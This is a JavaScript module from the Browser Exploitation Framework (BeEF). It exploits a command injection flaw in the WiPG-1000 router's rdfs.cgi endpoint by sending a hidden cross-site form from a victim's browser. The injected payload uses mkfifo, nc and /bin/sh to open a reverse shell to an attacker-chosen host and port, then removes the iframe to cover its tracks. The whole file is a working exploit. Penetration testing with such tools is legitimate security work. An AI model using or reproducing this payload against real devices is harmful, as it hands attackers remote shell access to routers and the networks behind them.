Path: blob/master/modules/exploits/router/wipg1000_cmd_injection/command.js
1875 views
//1// Copyright (c) 2006-2026 Wade Alcorn - [email protected]2// Browser Exploitation Framework (BeEF) - https://beefproject.com3// See the file 'doc/COPYING' for copying permission4//56beef.execute(function() {7var rhost = '<%= @rhost %>';8var rport = '<%= @rport %>';9var lhost = '<%= @lhost %>';10var lport = '<%= @lport %>';11var timeout = 15;1213var url = "http://" + rhost + ":" + rport + "/cgi-bin/rdfs.cgi";14var fifo = '/tmp/' + Math.random().toString(36).substring(7);15var payload = 'mkfifo ' + fifo + '; nc ' + lhost + ' ' + lport + ' 0<' + fifo + ' | /bin/sh >' + fifo + ' 2>&1; rm ' + fifo;1617beef.debug("[WiPG-1000 Command Injection] Sending payload: " + url);18var wipg1000_cmd_injection_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(19url, 'POST', 'application/x-www-form-urlencoded', [20{'type':'hidden', 'name':'Client', 'value':';' + payload + ';'},21{'type':'hidden', 'name':'Download', 'value':'Download'}22]);23beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");2425cleanup = function() {26document.body.removeChild(wipg1000_cmd_injection_iframe_<%= @command_id %>);27}28setTimeout("cleanup()", timeout*1000);2930});31323334